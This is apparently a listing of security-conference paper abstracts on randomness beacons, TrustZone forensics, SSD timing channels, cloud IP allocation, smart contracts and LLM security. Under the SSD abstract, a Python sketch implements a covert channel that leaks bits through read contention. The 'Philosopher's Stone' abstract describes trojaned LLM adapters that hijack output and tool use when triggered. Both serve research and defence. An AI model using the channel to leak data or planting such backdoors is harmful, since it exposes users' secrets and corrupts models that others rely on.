Abstract: We present Rondo, a scalable and reconfiguration-friendly distributed randomness beacon (DRB) protocol in the partially synchronous model. Rondo is the first DRB protocol that is built from batched asynchronous verifiable secret sharing (bAVSS) while avoiding the high O(n^3) message cost, where n is the number of nodes. Our key contribution lies in the introduction of a new variant of bAVSS called batched asynchronous verifiable secret sharing with partial output (bAVSS-PO). bAVSS-PO is a weaker primitive than bAVSS but allows us to build a secure and more scalable DRB protocol. We propose Breeze, a bAVSS-PO protocol. Breeze achieves the optimal O(n) message complexity for the sharing stage and allows Rondo to offer better scalability than prior DRB protocols. Additionally, to support reconfiguration, we introduce Rondo-BFT, a dynamic and partially synchronous Byzantine fault-tolerant protocol inspired by Dyno (S&P 2022). Unlike Dyno, Rondo-BFT provides a communication pattern that generates randomness beacon output periodically, making it well-suited for DRB applications.

We implement our protocols and evaluate the performance on Amazon EC2 using up to 91 instances. Our evaluation results show that Rondo achieves higher throughput than existing works and meanwhile offers better scalability, where the performance does not degrade as significantly as n grows.

Topic: Security and privacy for blockchains and cryptocurrencies


SCRUTINIZER: Towards Secure Forensics on Compromised TrustZone
Yiming Zhang (Southern University of Science and Technology and The Hong Kong Polytechnic University); Fengwei Zhang (Southern University of Science and Technology); Xiapu Luo (The Hong Kong Polytechnic University); Rui Hou (Institute of Information Engineering, Chinese Academy of Sciences); Xuhua Ding (Singapore Management University); Zhenkai Liang (National University of Singapore); Shoumeng Yan, Tao Wei, Zhengyu He (Ant Group)

Abstract: The number of vulnerabilities exploited in Arm TrustZone systems has been increasing recently. The absence of digital forensics tools prevents platform owners from performing incident response or periodic security scans. However, the area of secure forensics for compromised TrustZone systems remains unexplored and presents unresolved challenges. Traditional out-of-TrustZone forensics are inherently hindered by TrustZone protection, rendering them infeasible. In-TrustZone approaches are susceptible to attacks from privileged adversaries, undermining their security.

To fill these gaps, we introduce SCRUTINIZER, the first secure forensics solution for compromised TrustZone systems. SCRUTINIZER utilizes the highest privilege domain of the recent Arm Confidential Computing Architecture (CCA), called the Root world, and extends it to build a protected SCRUTINIZER Monitor. Our design proposes a protective layer in the Monitor that decouples the memory acquisition functionality from the Monitor and integrates it into an in-TrustZone agent. This ensures that the agent is isolated from TrustZone systems and helps to minimize the codebase expansion of the Root world. Furthermore, by grafting most of the target’s page tables in the agent, SCRUTINIZER reduces redundant translation and mapping operations during memory acquisition, ultimately reducing performance overhead. SCRUTINIZER leverages multiple standard hardware features to enable secure forensic capabilities beyond pure memory acquisition, such as memory access traps and instruction tracing, while making them impervious to hardware configuration tampering by the privileged adversary. We prototype SCRUTINIZER and evaluate it using extensive experiments. The results show that SCRUTINIZER effectively inspects TrustZone systems while remaining immune to privileged adversaries.

Topics: Cyber-crime defense and forensics (e.g., anti-phishing, anti-blackmailing, anti-fraud techniques) and Trustworthy computing software and hardware to secure networks and systems


Secret Spilling Drive: Leaking User Behavior through SSD Contention
Jonas Juffinger, Fabian Rauscher (Graz University of Technology); Giuseppe La Manna (Amazon); Daniel Gruss (Graz University of Technology)

Abstract: Covert channels and side channels bypass architectural security boundaries. Numerous works have studied covert channels and side channels in software and hardware. Thus, research on covert-channel and side-channel mitigations relies on the discovery of leaky hardware and software components.

In this paper, we perform the first study of timing channels inside modern commodity off-the-shelf SSDs. We systematically analyze the behavior of NVMe PCIe SSDs with concurrent workloads. We observe that exceeding the maximum I/O operations of the SSD leads to significant latency spikes. We narrow down the number of I/O operations required to still induce latency spikes on 12 different SSDs. Our results show that a victim process needs to read at least 8 to 128 blocks to still be detectable by an attacker. Based on these experiments, we show that an attacker can build a covert channel, where the sender encodes secret bits into read accesses to unrelated blocks, inaccessible to the receiver. We demonstrate that this covert channel works across different systems and different SSDs, even from processes running inside a virtual machine. Our unprivileged SSD covert channel achieves a true capacity of up to 1503 bit/s while it works across virtual machines (cross-VM) and is agnostic to operating system versions, as well as other hardware characteristics such as CPU or DRAM. Given the coarse granularity of the SSD timing channel, we evaluate it as a side channel in an open-world website fingerprinting attack over the top 100 websites. We achieve an F1 score of up to 97.0. This shows that the leakage goes beyond covert communication and can leak highly sensitive information from victim users. Finally, we discuss the root cause of the SSD timing channel and how it can be mitigated.
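
The contention mechanism can be sketched as follows. This is a simplified toy where sender and receiver run as separate processes on one machine: the sender bursts random reads on a large file to signal a '1' bit, and the receiver infers bits from the latency of its own probe reads. The file path, block counts, slot length, and threshold are placeholders, and page-cache effects are ignored, unlike in the actual attack.

```python
import os
import random
import time

# Toy SSD-contention covert channel (illustrative only; run send_bits and
# receive_bits in two separate processes).  All constants are placeholders.
PATH = "/tmp/large_test_file"         # pre-created multi-GB file (placeholder)
BLOCK = 4096
SLOT = 0.05                           # seconds per bit slot

def random_read(fd, filesize):
    off = random.randrange(0, filesize - BLOCK, BLOCK)
    os.pread(fd, BLOCK, off)

def send_bits(bits):
    fd = os.open(PATH, os.O_RDONLY)
    size = os.fstat(fd).st_size
    for b in bits:
        end = time.monotonic() + SLOT
        while time.monotonic() < end:
            if b == 1:
                random_read(fd, size)    # saturate I/O to create contention
            else:
                time.sleep(0.001)        # stay idle for a '0'
    os.close(fd)

def receive_bits(n_bits, threshold_s=0.002):
    fd = os.open(PATH, os.O_RDONLY)
    size = os.fstat(fd).st_size
    bits = []
    for _ in range(n_bits):
        t0 = time.monotonic()
        for _ in range(8):               # probe reads inside one slot
            random_read(fd, size)
        elapsed = time.monotonic() - t0
        bits.append(1 if elapsed > threshold_s else 0)
        time.sleep(max(0.0, SLOT - elapsed))
    os.close(fd)
    return bits
```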

Topics: Security for cloud/edge computing and Software/firmware/hardware security analysis, customization, and extensions


Secure IP Address Allocation at Cloud Scale
Eric Pauley, Kyle Domico, Blaine Hoak, Ryan Sheatsley, Quinn Burke, Yohan Beugin (University of Wisconsin–Madison); Engin Kirda (Northeastern University); Patrick McDaniel (University of Wisconsin–Madison)

Abstract: Public clouds necessitate dynamic resource allocation and sharing. However, the dynamic allocation of IP addresses can be abused by adversaries to source malicious traffic, bypass rate limiting systems, and even capture traffic intended for other cloud tenants. As a result, both the cloud provider and their customers are put at risk, and defending against these threats requires a rigorous analysis of tenant behavior, adversarial strategies, and cloud provider policies. In this paper, we develop a practical defense for IP address allocation through such an analysis. We first develop a statistical model of cloud tenant deployment behavior based on literature and measurement of deployed systems. Through this, we analyze IP allocation policies under existing and novel threat models. In response to our stronger proposed threat model, we design IP scan segmentation, an IP allocation policy that protects the address pool against adversarial scanning even when an adversary is not limited by number of cloud tenants. Through empirical evaluation on both synthetic and real-world allocation traces, we show that IP scan segmentation reduces adversaries’ ability to rapidly allocate addresses, protecting both address space reputation and cloud tenant data. In this way, we show that principled analysis and implementation of cloud IP address allocation can lead to substantial security gains for tenants and their users.
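
As one plausible toy reading of pool segmentation (our illustrative guess; the paper’s actual IP scan segmentation policy differs in its details), the sketch below pins each tenant to one segment of the address pool, so a tenant that churns through many allocations still only ever observes a small slice of the pool.

```python
import hashlib
import ipaddress
import random

# Toy "segmented" allocation policy (illustrative reading only, NOT the
# paper's exact mechanism).  The pool uses a documentation address range.
POOL = list(ipaddress.ip_network("198.51.100.0/24").hosts())
NUM_SEGMENTS = 8
SEG_SIZE = len(POOL) // NUM_SEGMENTS
SEGMENTS = [POOL[i * SEG_SIZE:(i + 1) * SEG_SIZE] for i in range(NUM_SEGMENTS)]

def segment_for(tenant_id):
    h = int(hashlib.sha256(tenant_id.encode()).hexdigest(), 16)
    return SEGMENTS[h % NUM_SEGMENTS]

def allocate(tenant_id):
    return random.choice(segment_for(tenant_id))

# An adversarial tenant repeatedly allocating and releasing addresses only
# ever sees addresses from its own segment of the pool.
seen = {allocate("adversary-tenant") for _ in range(1000)}
print(f"distinct addresses observed: {len(seen)} "
      f"out of a pool of {len(POOL)} (segment size {SEG_SIZE})")
```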

Topic: Security for cloud/edge computing


Secure Transformer Inference Made Non-interactive
Jiawen Zhang, Xinpeng Yang (Zhejiang University); Lipeng He (University of Waterloo); Kejia Chen, Wen-jie Lu, Yinghao Wang, Xiaoyang Hou, Jian Liu, Kui Ren, Xiaohu Yang (Zhejiang University)

Abstract: Secure transformer inference has emerged as a prominent research topic following the proliferation of ChatGPT. Existing solutions are typically interactive, involving substantial communication load and numerous interaction rounds between the client and the server.

In this paper, we propose NEXUS, the first non-interactive protocol for secure transformer inference. The protocol requires the client to engage in just one round of communication with the server during the whole inference process: submitting an encrypted input and receiving an encrypted result. NEXUS introduces several novel primitives, including SIMD ciphertext compression/decompression, SIMD slot folding, and secure Argmax, which enable it to significantly surpass the state-of-the-art in communication while maintaining comparable runtime. Specifically, it reduces bandwidth consumption by 372.5× compared to BOLT (Oakland ’24) and 53.6× compared to Bumblebee (NDSS ’25). Furthermore, its non-interactive property allows for optimal hardware acceleration, with the GPU version achieving a 42.3× speedup in runtime. This enables NEXUS to run inference on a BERT-based model in just 37.3 seconds, consuming only 164 MB of bandwidth.

Topic: Security and privacy of systems based on machine learning, federated learning, AI, and large language models


Silence False Alarms: Identifying Anti-Reentrancy Patterns on Ethereum to Refine Smart Contract Reentrancy Detection
Qiyang Song (Institute of Information Engineering, Chinese Academy of Sciences; School of Cyber Security, University of Chinese Academy of Sciences); Heqing Huang (Institute of Information Engineering, Chinese Academy of Sciences); Xiaoqi Jia, Yuanbo Xie (Institute of Information Engineering, Chinese Academy of Sciences; School of Cyber Security, University of Chinese Academy of Sciences); Jiahao Cao (Institute for Network Sciences and Cyberspace, Tsinghua University)

Abstract: Reentrancy vulnerabilities in Ethereum smart contracts have caused significant financial losses, prompting the creation of several automated reentrancy detectors. However, these detectors frequently yield a high rate of false positives due to coarse detection rules, often misclassifying contracts protected by anti-reentrancy patterns as vulnerable. Thus, there is a critical need for the development of specialized automated tools to assist these detectors in accurately identifying anti-reentrancy patterns. While existing code analysis techniques show promise for this specific task, they still face significant challenges in recognizing anti-reentrancy patterns. These challenges are primarily due to the complex and varied features of anti-reentrancy patterns, compounded by insufficient prior knowledge about these features.

This paper introduces AutoAR, an automated recognition system designed to explore and identify prevalent anti-reentrancy patterns in Ethereum contracts. AutoAR utilizes a specialized graph representation, RentPDG, combined with a data filtration approach, to effectively capture anti-reentrancy-related semantics from a large pool of contracts. Based on RentPDGs extracted from these contracts, AutoAR employs a recognition model that integrates a graph auto-encoder with a clustering technique, specifically tailored for precise anti-reentrancy pattern identification. Experimental results show AutoAR can assist existing detectors in identifying 12 prevalent anti-reentrancy patterns with 89% accuracy, and when integrated into the detection workflow, it significantly reduces false positives by over 85%.

Topics: Anti-malware techniques: detection, analysis, and prevention; Security and privacy for blockchains and cryptocurrencies and Security for large-scale, critical infrastructures (e.g., electronic voting, smart grid)


The (Un)usual Suspects – Studying Reasons for Lacking Updates in WordPress
Maria Hellenthal, Lena Gotsche, Rafael Mrowczynski (CISPA Helmholtz Center for Information Security); Sarah Kugel (Saarland University); Michael Schilling, Ben Stock (CISPA Helmholtz Center for Information Security)

Abstract: The widespread use of Content Management Systems (CMS) like WordPress has made these systems attractive targets for adversaries, with vulnerabilities in the code posing serious risks. Despite updates being the most effective way to reduce these risks, more than half of all CMS installations lack the latest security patches. Researchers have tried to notify website operators about vulnerabilities using vulnerability notifications, which often exhibit limited impact. In this paper, we use the Grounded Theory approach to investigate the reasons why website owners do not update their CMS. To gain a holistic view of lacking update behavior, we interviewed website owners with outdated WordPress-based systems as well as individuals involved in website creation and hosting. On the one hand, we could confirm issues known from other ecosystems, such as lack of risk awareness, perceived risks of updates, and update costs, as factors for lacking CMS updates. More importantly, our study identified factors that have not been explicitly addressed in the general updating behavior and vulnerability notification literature: (1) the subjective value of a website to its owner and (2) the delegation of website operations, which influence updating behavior far more decisively. Furthermore, we showed that website owners perceive a potential compromise of their CMS only as a risk to themselves and not as a threat to the wider online community. These findings, which we present as four non-update scenarios, may partly explain the limited success of previous efforts to notify operators about vulnerabilities in their systems. Our study not only offers valuable insights for future research testing the effectiveness of vulnerability notifications and studying updating behavior in general, but it also proposes practical suggestions on how to reduce the number of outdated systems on the web.

Topic: Usable security and privacy


The Midas Touch: Triggering the Capability of LLMs for RM-API Misuse Detection
Yi Yang, Jinghua Liu, Kai Chen, Miaoqian Lin (Institute of Information Engineering, Chinese Academy of Sciences, Beijing, China; School of Cyber Security, University of Chinese Academy of Sciences, China)

Abstract: As the basis of software resource management (RM), strictly following RM-API constraints guarantees secure resource management and secure software. To enhance RM-API application, researchers have found it effective to detect RM-API misuse in open-source software according to RM-API constraints retrieved from documentation and code. However, current pattern-matching constraint-retrieval methods have limitations: documentation-based methods leave undiscovered many API constraints that are irregularly distributed or expressed with neutral sentiment, while code-based methods report many false bugs because not all high-frequency usages are correct. Researchers have therefore proposed utilizing Large Language Models (LLMs) for RM-API constraint retrieval, given their potential for text analysis and generation. However, directly using LLMs has limitations due to hallucinations: LLMs fabricate answers beyond their expertise, leaving many RM APIs undiscovered, and generate incorrect answers even when given evidence, introducing incorrect RM-API constraints and false bugs.

In this paper, we propose an LLM-empowered RM-API misuse detection solution, ChatDetector, which fully automates LLM-based documentation understanding for RM-API constraint retrieval and RM-API misuse detection. To correctly retrieve the RM-API constraints, ChatDetector is inspired by the ReAct framework, which is optimized based on Chain-of-Thought (CoT) reasoning, to decompose the complex task into allocation-API identification, RM-object (allocated/released by RM APIs) extraction, and RM-API pairing (RM APIs usually exist in pairs). It first verifies the semantics of allocation APIs based on the RM sentences retrieved from API documentation through LLMs. Inspired by the LLMs’ performance under various prompting methods, ChatDetector adopts a two-dimensional prompting approach for cross-validation. At the same time, an inconsistency-checking approach between the LLMs’ output and the reasoning process is adopted to confirm the allocation APIs with an off-the-shelf Natural Language Processing (NLP) tool. To accurately pair the RM APIs, ChatDetector decomposes the task again and identifies the RM-object type first, with which it can then accurately pair the releasing APIs and further construct the RM-API constraints for misuse detection. With diminished hallucinations, ChatDetector identifies 165 pairs of RM APIs with a precision of 98.21% compared with the state-of-the-art API detectors. By employing the static detector CodeQL, we ethically report 115 security bugs in applications integrating six popular libraries to the developers; these bugs may result in severe issues, such as Denial-of-Service (DoS) and memory corruption. Compared with the end-to-end benchmark method, the results show that ChatDetector can retrieve at least 47% more RM sentences and 80.85% more RM-API constraints. Since, to the best of our knowledge, no prior work utilizes LLMs for RM-API misuse detection, these inspiring results show that LLMs can assist in generating constraints beyond existing expertise and can be used for bug detection. They also indicate that future research could shift from overcoming the bottlenecks of traditional NLP tools to creatively utilizing LLMs for security research.

Topics: Security and privacy of systems based on machine learning, federated learning, AI, and large language models and Software/firmware/hardware security analysis, customization, and extensions


The Philosopher’s Stone: Trojaning Plugins of Large Language Models
Tian Dong (Shanghai Jiao Tong University, China); Minhui Xue (CSIRO’s Data61, Australia); Guoxing Chen (Shanghai Jiao Tong University, China); Rayne Holland (CSIRO’s Data61, Australia); Yan Meng (Shanghai Jiao Tong University, China); Shaofeng Li (Southeast University, China); Zhen Liu, Haojin Zhu (Shanghai Jiao Tong University, China)

Abstract: Open-source Large Language Models (LLMs) have recently gained popularity because of their comparable performance to proprietary LLMs. To efficiently fulfill domain-specialized tasks, open-source LLMs can be refined, without expensive accelerators, using low-rank adapters. However, it is still unknown whether low-rank adapters can be exploited to control LLMs. To address this gap, we demonstrate that an infected adapter can induce, on specific triggers, an LLM to output content defined by an adversary and to even maliciously use tools. To train a Trojan adapter, we propose two novel attacks, POLISHED and FUSION, that improve over prior approaches. POLISHED uses a superior LLM to align naïvely poisoned data based on our insight that it can better inject poisoning knowledge during training. In contrast, FUSION leverages a novel over-poisoning procedure to transform a benign adapter into a malicious one by magnifying the attention between trigger and target in model weights. In our experiments, we first conduct two case studies to demonstrate that a compromised LLM agent can use malware to control the system (e.g., an LLM-driven robot) or to launch a spear-phishing attack. Then, in terms of targeted misinformation, we show that our attacks provide higher attack effectiveness than the existing baseline and, for the purpose of attracting downloads, preserve or improve the adapter’s utility. Finally, we designed and evaluated three potential defenses. However, none proved entirely effective in safeguarding against our attacks, highlighting the need for more robust defenses supporting a secure LLM supply chain.

Topics: Cyber-crime defense and forensics (e.g., anti-phishing, anti-blackmailing, anti-fraud techniques); Security and privacy of systems based on machine learning, federated learning, AI, and large language models; Security of web-based applications and services (e.g., social networking, crowd-sourcing, fake news/disinformation), web security and privacy and Usable security and privacy


The Power of Words: A Comprehensive Analysis of Rationales and Their Effects on Users’ Permission Decisions
Yusra Elbitar (CISPA Helmholtz Center for Information Security and Saarland University); Alexander Hart, Sven Bugiel (CISPA Helmholtz Center for Information Security)

Abstract: Rationales offer a method for app developers to convey their permission needs to users. While guidelines and recommendations exist on how to request permissions, developers have the creative freedom to design and phrase these rationales. In this work, we explore the characteristics of real-world rationales and how their building blocks affect users’ permission decisions and their evaluation of those decisions. Through an analysis of 720 sentences and 428 screenshots of rationales from the top apps of Google Play, we identify the various phrasing and design elements of rationales. Subsequently, in a user study involving 960 participants, we explore how different combinations of phrasings impact users’ permission decision-making process. By aligning our insights with established recommendations, we offer actionable guidelines for developers, aiming to make rationales a usable security instrument for users.

Topics: Security and privacy of mobile/smartphone platforms and their operating systems and Usable security and privacy


The Skeleton Keys: A Large Scale Analysis of Credential Leakage in Mini-apps
Yizhe Shi, Zhemin Yang, Kangwei Zhong, Guangliang Yang, Yifan Yang, Xiaohan Zhang, Min Yang (Fudan University)

Abstract: In recent years, the app-in-app paradigm, involving super-apps and mini-apps, has become increasingly popular in the mobile ecosystem. Super-app platforms offer mini-app servers access to a suite of powerful and sensitive services, including payment processing and mini-app analytics. This access empowers mini-app servers to enhance their offerings with robust and practical functionalities and better serve their mini-apps. To safeguard these essential services, a credential-based authentication system has been implemented, facilitating secure access between super-app platforms and mini-app servers. However, the design and workflow of this crucial credential mechanism remain unclear. More importantly, its security has not been comprehensively understood or explored to date.

In this paper, we conduct the first systematic study of the credential system in the app-in-app paradigm and map the security landscape of credential leakage risks. Our study shows that 21 popular super-app platforms delegate sensitive services to mini-app servers with seven types of credentials. Unfortunately, these credentials may suffer from leakage threats caused by malicious mini-app users, posing serious security threats to both super-app platforms and mini-app servers. We then design and implement a novel credential security verification tool, called KeyMagnet, that can effectively assess the security implications of credential leakage. To tackle unstructured and dynamically retrieved credentials in the app-in-app paradigm, KeyMagnet extracts and understands the semantics of credential use in mini-apps and verifies their security. Finally, by applying KeyMagnet to 413,775 real-world mini-apps on 6 super-app platforms, we detect 84,491 credential leaks spanning 54,728 mini-apps. We confirm that credential leakage can cause serious security hazards, such as hijacking the accounts of all mini-app users and stealing users’ sensitive data. In response, we have engaged in responsible vulnerability disclosure with the corresponding developers and are actively helping them resolve these issues. At the time of writing, 89 reported issues have been assigned CVE IDs.

Topics: Security and privacy of mobile/smartphone platforms and their operating systems and Security of web-based applications and services (e.g., social networking, crowd-sourcing, fake news/disinformation), web security and privacy


THEMIS: Regulating Textual Inversion for Personalized Concept Censorship
Yutong Wu (Nanyang Technological University); Jie Zhang (Centre for Frontier AI Research, Agency for Science, Technology and Research (A*STAR), Singapore); Florian Kerschbaum (University of Waterloo); Tianwei Zhang (Nanyang Technological University)

Abstract: Personalization has become a crucial demand in generative AI technology. As pre-trained generative models (e.g., Stable Diffusion) have fixed and limited capabilities, it is desirable for users to customize the model to generate output with new or specific concepts. Fine-tuning the pre-trained model is not a promising solution, due to its high requirements of computation resources and data. Instead, emerging personalization approaches make it feasible to augment the generative model in a lightweight manner. However, this also induces severe threats if such advanced techniques are misused by malicious users, such as spreading fake news or defaming individual reputations. Thus, it is necessary to regulate personalization models (i.e., achieve concept censorship) for their development and advancement.

In this paper, we focus on the regulation of a popular personalization technique dubbed Textual Inversion (TI), which can customize Text-to-Image (T2I) generative models with excellent performance. TI crafts a word embedding that contains detailed information about a specific object. Users can easily add the word embedding to their local T2I model, such as the public Stable Diffusion (SD) model, to generate personalized images. The advent of TI has brought about a new business model, evidenced by public platforms for sharing and selling word embeddings (e.g., Civitai [1]). Unfortunately, such platforms also allow malicious users to misuse the word embeddings to generate unsafe content, causing damage to the concept owners.

We propose THEMIS to achieve personalized concept censorship. Its key idea is to leverage the backdoor technique for good by injecting positive backdoors into the TI embeddings. Briefly, the concept owner selects some sensitive words as triggers during the training of TI, which will be censored for normal use. In the subsequent generation stage, if a malicious user combines the sensitive words with the personalized embeddings as final prompts, the T2I model will output a pre-defined target image rather than images containing the desired malicious content. To demonstrate the effectiveness of THEMIS, we conduct extensive experiments on TI embeddings with Latent Diffusion and Stable Diffusion, two prevailing open-source T2I models. The results demonstrate that THEMIS is capable of preventing Textual Inversion from cooperating with sensitive words while guaranteeing its pristine utility. Furthermore, THEMIS generalizes to different uses of sensitive words, including different locations, synonyms, and combinations of sensitive words. It can also resist different types of potential and adaptive attacks. Ablation studies are also conducted to verify our design.

Topic: Security and privacy of systems based on machine learning, federated learning, AI, and large language models


Time-varying Bottleneck Links in LEO Satellite Networks: Identification, Exploits, and Countermeasures
Yangtao Deng (Tsinghua University); Qian Wu, Zeqi Lai (Tsinghua University and Zhongguancun Laboratory); Chenwei Gu (Tsinghua University); Hewu Li, Yuanjie Li, Jun Liu (Tsinghua University and Zhongguancun Laboratory)

Abstract: In this paper, we perform a multifaceted study of the security risks posed by the unique time-varying bottleneck links in emerging Low-Earth Orbit (LEO) satellite networks (LSNs). We carry out our study in three steps. First, we profile the spatial and temporal characteristics of bottleneck links and show how they might be exploited for bottleneck identification; these bottleneck links thus impose a new risk of link flooding attacks (LFAs) on LSNs. Second, we propose SKYFALL, a new LFA risk analyzer that enables satellite network operators to simulate various LFA behaviors and comprehensively analyze the consequences for LSN services. Concretely, SKYFALL’s analysis based on real-world information from operational LSNs demonstrates that the throughput of legitimate background traffic could be reduced by a factor of 3.4 if an attacker can manipulate a number of compromised user terminals to continuously congest the bottleneck links. Based on our analysis, we finally discuss the limitations of traditional LFA countermeasures and propose new mitigation strategies for LSNs.

Topics: Cyber attack (e.g., APTs, botnets, DDoS) prevention, detection, investigation, and response; Security for emerging networks (e.g., smart homes, IoT, body-area networks, VANETs); Security for future Internet architectures and designs (e.g., Software-Defined Networking) and Security for large-scale, critical infrastructures (e.g., electronic voting, smart grid)


Too Subtle to Notice: Investigating Executable Stack Issues in Linux Systems
Hengkai Ye, Hong Hu (The Pennsylvania State University)

Abstract: Code injection was a favored technique for attackers to exploit buffer overflow vulnerabilities decades ago. Subsequently, the widespread adoption of lightweight solutions like write-xor-execute (W⊕X) effectively mitigated most of these attacks by disallowing writable-and-executable memory. However, we observe multiple concerning cases where software developers accidentally disabled W⊕X and reintroduced executable stacks to popular applications. Although each violation has been properly fixed, a lingering question remains: what underlying factors contribute to these recurrent mistakes among developers, even in contemporary software development practices?

In this paper, we conduct two investigations to gain a comprehensive understanding of the challenges associated with properly enforcing W⊕X in Linux systems. First, we delve into program-hardening tools to assess whether experienced security developers consistently take the necessary steps to avoid executable stacks. Second, we analyze the enforcement of W⊕X on Linux by inspecting the source code of the compilation toolchain, the kernel, and the loader. Our investigation reveals that properly enforcing W⊕X on Linux requires close collaboration among multiple components, which form a complex chain of trust and dependency to safeguard the program stack. However, developers, including security researchers, may overlook the subtle yet essential .note.GNU-stack section when writing assembly code for various purposes and inadvertently introduce executable stacks. For example, 11 program-hardening tools implemented as inlined reference monitors (IRMs) introduce executable stacks to all “hardened” applications. Based on these findings, we discuss potential exploitation scenarios and provide suggestions to mitigate this issue.
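Though not part of the paper, the condition described above is easy to observe directly: on Linux, each mapping’s permissions are listed in /proc/self/maps, so a process can check at runtime whether its own stack ended up executable, which is exactly what a dropped .note.GNU-stack note (or an explicit -z execstack link flag) causes. The following minimal C++ sketch, assuming only the standard /proc/<pid>/maps layout, performs that check.

    // exec_stack_check.cpp -- illustrative sketch, not tooling from the paper.
    // Reads /proc/self/maps (Linux) and reports whether the main thread's
    // [stack] mapping carries the executable (x) permission bit, i.e.,
    // whether W^X has been silently lost for the stack.
    #include <fstream>
    #include <iostream>
    #include <sstream>
    #include <string>

    int main() {
        std::ifstream maps("/proc/self/maps");
        if (!maps) {
            std::cerr << "cannot open /proc/self/maps (Linux only)\n";
            return 1;
        }
        std::string line;
        while (std::getline(maps, line)) {
            if (line.find("[stack]") == std::string::npos) continue;
            // Each line looks like:
            // "7ffd1c2e0000-7ffd1c301000 rw-p 00000000 00:00 0  [stack]"
            std::istringstream fields(line);
            std::string range, perms;
            fields >> range >> perms;                    // first two columns
            bool executable = perms.size() >= 3 && perms[2] == 'x';
            std::cout << "[stack] " << range << " perms=" << perms
                      << (executable ? "  -> executable stack (W^X violated)\n"
                                     : "  -> non-executable stack\n");
            return executable ? 2 : 0;
        }
        std::cerr << "no [stack] entry found\n";
        return 1;
    }

Building this with a plain g++ invocation should report a non-executable stack; relinking it with -z execstack, or together with an assembly object that omits the GNU-stack note, should flip the report.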

Topic: Software/firmware/hardware security analysis, customization, and extensions


TrajDeleter: Enabling Trajectory Forgetting in Offline Reinforcement Learning Agents
Chen Gong (University of Virginia); Kecen Li (Institute of Automation, Chinese Academy of Sciences); Jin Yao, Tianhao Wang (University of Virginia)

Abstract: Reinforcement learning (RL) trains an agent from experiences interacting with the environment. In scenarios where online interactions are impractical, offline RL, which trains the agent using pre-collected datasets, has become popular. While this new paradigm presents remarkable effectiveness across various real-world domains, like healthcare and energy management, there is a growing demand to enable agents to rapidly and completely eliminate the influence of specific trajectories from both the training dataset and the trained agents. To address this problem, this paper advocates TRAJDELETER, the first practical approach to trajectory unlearning for offline RL agents. The key idea of TRAJDELETER is to guide the agent to exhibit deteriorating performance when it encounters states associated with the unlearning trajectories, while ensuring that the agent maintains its original performance level when facing the remaining trajectories. Additionally, we introduce TRAJAUDITOR, a simple yet efficient method to evaluate whether TRAJDELETER successfully eliminates the influence of the specified trajectories from the offline RL agent. Extensive experiments conducted on six offline RL algorithms and three tasks demonstrate that TRAJDELETER requires only about 1.5% of the time needed for retraining from scratch. It effectively unlearns an average of 94.8% of the targeted trajectories yet still performs well in actual environment interactions after unlearning. The replication package and agent parameters are available.

Topic: Security and privacy of systems based on machine learning, federated learning, AI, and large language models


Transparency or Information Overload? Evaluating Users’ Comprehension and Perceptions of the iOS App Privacy Report
Xiaoyuan Wu, Lydia Hu, Eric Zeng, Hana Habib, Lujo Bauer (Carnegie Mellon University)

Abstract: Apple’s App Privacy Report (“privacy report”), released in 2021, aims to inform iOS users about apps’ access to their data and sensors (e.g., contacts, camera) and, unlike other privacy dashboards, what domains are contacted by apps and websites. To evaluate the effectiveness of the privacy report, we conducted semi-structured interviews (n = 20) to examine users’ reactions to the information, their understanding of relevant privacy implications, and how they might change their behavior to address privacy concerns. Participants easily understood which apps accessed data and sensors at certain times on their phones, and knew how to remove an app’s permissions in case of unexpected access. In contrast, participants had difficulty understanding apps’ and websites’ network activities. They were confused about how and why network activities occurred, overwhelmed by the number of domains their apps contacted, and uncertain about what remedial actions they could take against potential privacy threats. While the privacy report and similar tools can increase transparency by presenting users with details about how their data is handled, we recommend providing more interpretation or aggregation of technical details, such as the purpose of contacting domains, to help users make informed decisions.

Topics: Security and privacy of mobile/smartphone platforms and their operating systems and Usable security and privacy


Tweezers: A Framework for Security Event Detection via Event Attribution-centric Tweet Embedding
Jian Cui (Indiana University); Hanna Kim (KAIST); Eugene Jang, Dayeon Yim, Kicheol Kim, Yongjae Lee, Jin-Woo Chung (S2W Inc.); Seungwon Shin (KAIST); Xiaojing Liao (Indiana University)

Abstract: Twitter is recognized as a crucial platform for the dissemination and gathering of Cyber Threat Intelligence (CTI). Its capability to provide real-time, actionable intelligence makes it an indispensable tool for detecting security events, helping security professionals cope with ever-growing threats. However, the large volume of tweets and the inherent noise of human-crafted tweets pose significant challenges in accurately identifying security events. While many studies have tried to filter event-related tweets based on keywords, such approaches are not effective because of their limited ability to understand the semantics of tweets. Another challenge in security event detection from Twitter is comprehensive coverage of security events. Previous studies emphasized the importance of early detection of security events but overlooked the importance of event coverage. To cope with these challenges, we introduce a novel event attribution-centric tweet embedding method that enables high precision and coverage of events. Our experimental results show that the proposed method outperforms existing text- and graph-based tweet embedding methods in identifying security events. Leveraging this novel embedding approach, we have developed and implemented a framework, Tweezers, that is applicable to security event detection from Twitter for CTI gathering. This framework has demonstrated its effectiveness, detecting twice as many events compared to established baselines. Additionally, we showcase two applications built on Tweezers for the integration and inspection of security events, i.e., security event trend analysis and informative security user identification.

Topic: Cyber-crime defense and forensics (e.g., anti-phishing, anti-blackmailing, anti-fraud techniques)


type++: Prohibiting Type Confusion with Inline Type Information
Nicolas Badoux (EPFL); Flavio Toffalini (Ruhr-Universität Bochum and EPFL); Yuseok Jeon (UNIST); Mathias Payer (EPFL)

Abstract: Type confusion, or bad casting, is a common C++ attack vector. Such vulnerabilities cause a program to interpret an object as belonging to a different type, enabling powerful attacks, like control-flow hijacking. C++ limits runtime checks to polymorphic classes because only those have inline type information. The lack of runtime type information throughout an object’s lifetime makes it challenging to enforce continuous checks and thereby prevent type confusion during downcasting. Current solutions either record type information for all objects disjointly, incurring prohibitive runtime overhead, or restrict protection to a fraction of all objects.

Our C++ dialect, type++, enforces the paradigm that each allocated object involved in downcasting carries type information throughout its lifetime, ensuring correctness by enabling type checks wherever and whenever necessary. As not just polymorphic objects but all objects are typed, all downcasts can now be dynamically verified. Compared to existing solutions, our strategy greatly reduces runtime cost and enables type++ usage both during testing and as a mitigation. Targeting SPEC CPU2006 and CPU2017, we compile and run 2,040 kLoC while changing only 314 LoC. To help developers, our static analysis warns where code changes in target programs may be necessary. Running the compiled benchmarks results in negligible performance overhead (1.19% on SPEC CPU2006 and 0.82% on SPEC CPU2017) while verifying a total of 90B casts (compared to 3.8B for the state of the art, a 23× improvement). type++ discovers 122 type confusion issues in the SPEC CPU benchmarks, among which 62 are new. Targeting Chromium, we change 229 LoC out of 35 MLoC to protect 94.6% of the classes that could be involved in downcasting vulnerabilities, while incurring only 0.98% runtime overhead compared to the baseline.
